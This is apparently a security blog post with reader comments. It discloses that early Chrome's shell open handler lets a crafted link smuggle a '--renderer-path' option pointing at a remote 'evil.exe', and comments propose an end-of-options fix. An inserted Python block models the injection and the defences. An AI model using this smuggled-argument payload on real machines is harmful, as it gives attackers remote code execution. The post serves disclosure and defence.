Google Chrome Options
The things I am about to discuss are not a big deal, but we should keep them in mind.
If you haven’t noticed yet, Google Chrome supports a bunch of command line options. You can get a listing of all of them from chrome_switches.cc. Obviously, some of them look quite powerful. Is that a concern? IMHO, yes, but there is no reason to panic just yet.
Why is this a concern? I will put it this way. There are far too many applications that misbehave when launching links. QuickTime is one of them. Remember QuickTime Pwns Firefox? Mozilla has discontinued the -chrome command line option in order to prevent similar attacks from occurring again. Even if applications do not misbehave and use the Windows GUI shell open bindings as they are, attackers can still abuse all of these options. For example, the browser’s shell open command for http URLs is registered like this:
c:\path\to\chrome.exe "%s"
At first glance this seems secure, although it is not. Now, if I have an app that allows me to click on a user-supplied link which contains the following href:
--renderer-path=\\nbtlocation\evil\evil.exe
Then the browser will launch like this:
c:\path\to\chrome.exe "--renderer-path=\\nbtlocation\evil\evil.exe"
…which is enough to launch Chrome with evil.exe as the default renderer. Obviously, this is remote ownage, and although most ISPs won’t allow NetBIOS traffic over the Internet, some of them do. Locally, this is very feasible to exploit, especially on WiFi networks.
Chrome is at a very early stage of development and I understand that those features are there because the early adopters will be developers, which is fine. I would say that some of the dangerous options even look very useful for normal users. However, Google might want to consider including some #ifdefs to ensure that none of the dangerous features are enabled in the builds that users download for normal use.
Comments
This is a good point. I think the best way to fix it is not to remove those options, though, but instead to change the shell open command to c:\path\to\chrome.exe -- "%s". Traditionally, -- as an argument means “end of options”, specifying that only input files follow. However, an equally effective measure might be c:\path\to\chrome.exe "--url=%s".
This removes the vulnerability from the shell’s open URL command, but still leaves the flexibility provided by allowing command-line arguments.
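The argument injection described in the post above and the end-of-options fix proposed in this comment, as an added example that is not part of the original post, the comment, or Chrome’s own code. The three shell open templates are the ones quoted on the page; the toy switch parser, the argv splitter and the link check are constructed stand-ins (Chrome’s real command line parsing is not modelled), and the injected href is the one from the post.

```python
import re
from urllib.parse import urlsplit

# Shell open command templates as quoted on the page. "%s" is where the
# Windows shell substitutes the clicked URL before launching the browser.
VULNERABLE_TEMPLATE = r'c:\path\to\chrome.exe "%s"'
END_OF_OPTIONS_TEMPLATE = r'c:\path\to\chrome.exe -- "%s"'
URL_SWITCH_TEMPLATE = r'c:\path\to\chrome.exe "--url=%s"'

# The href from the post: an option, not a URL, smuggled in as the link.
INJECTED_LINK = r"--renderer-path=\\nbtlocation\evil\evil.exe"
NORMAL_LINK = "http://example.com/"


def split_command(cmd):
    """Minimal Windows-style command split (constructed model): double-quoted
    tokens stay whole and lose their quotes, everything else splits on spaces."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmd)]


def build_argv(template, link):
    """Substitute the link into the registered template, the way the shell
    does, and return the argv the browser process actually receives."""
    return split_command(template.replace("%s", link))


def parse_switches(argv):
    """Toy model of a browser switch parser (assumption, not Chrome's code):
    '--name=value' before a bare '--' is a switch, '--url=' names a page to
    open, a bare '--' ends option parsing, and anything else is a URL."""
    switches, urls = {}, []
    end_of_options = False
    for arg in argv[1:]:
        if not end_of_options and arg == "--":
            end_of_options = True
        elif not end_of_options and arg.startswith("--"):
            name, _, value = arg[2:].partition("=")
            if name == "url":
                urls.append(value)
            else:
                switches[name] = value
        else:
            urls.append(arg)
    return switches, urls


def is_safe_navigation_target(link):
    """Check a launching application can apply before handing a user-supplied
    link to the registered handler: refuse anything that looks like an option
    and accept only http(s) URLs that actually name a host."""
    if link.startswith("-"):
        return False
    parts = urlsplit(link)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def outcome(template, link):
    """Return the (switches, urls) the browser would see for one template."""
    return parse_switches(build_argv(template, link))


if __name__ == "__main__":
    for name, tpl in (("vulnerable", VULNERABLE_TEMPLATE),
                      ("end-of-options", END_OF_OPTIONS_TEMPLATE),
                      ("--url switch", URL_SWITCH_TEMPLATE)):
        switches, urls = outcome(tpl, INJECTED_LINK)
        print(f"{name:15} switches={switches} urls={urls}")
    print("link check:", is_safe_navigation_target(INJECTED_LINK),
          is_safe_navigation_target(NORMAL_LINK))
```

Run as a script it shows that only the first template turns the injected href into a switch; with either hardened template the same string is treated as a (bogus) URL to open, and the link check gives an application that launches URLs a second line of defence that does not depend on how the handler is registered.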
hahaha nice, very nice post.
Ryan, yes, this is what Chris Evans suggested as well.
You totally found this file (http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc) by doing a “find in files” for “file://”! I like your file:// hack for quicktime, how did you know it was a flaw?
Yes, it’s a reasonable defense in depth measure so I’ll make it happen.
I’m highly disappointed by Chrome. Google had the manpower to create something new and epic, but they failed. I mean what are they doing? copying Webkit and tweaking it a bit?
It’s sad dudes, I’m really disappointed that no-one in this Universe seems to create a secure browser. For real, it’s that bad!
It’s depressing at most.
10x, Chris. Keep up the good work!
what’s the difference between %s %l and %* ?
I’m inclined to believe that Google is simply testing the waters by releasing Chrome; I also think something truly deceptive is going on in releasing it that I can’t quite grasp.
https://kinqpinz.info/lib/2008/sep/#d5ab0fdf
it’s funny, the more i use Chrome, the more unstable it seems to get… crashes a lot more, can’t handle sites with flash, hangs every time i close a tab… all that to say, i’m switching back to Firefox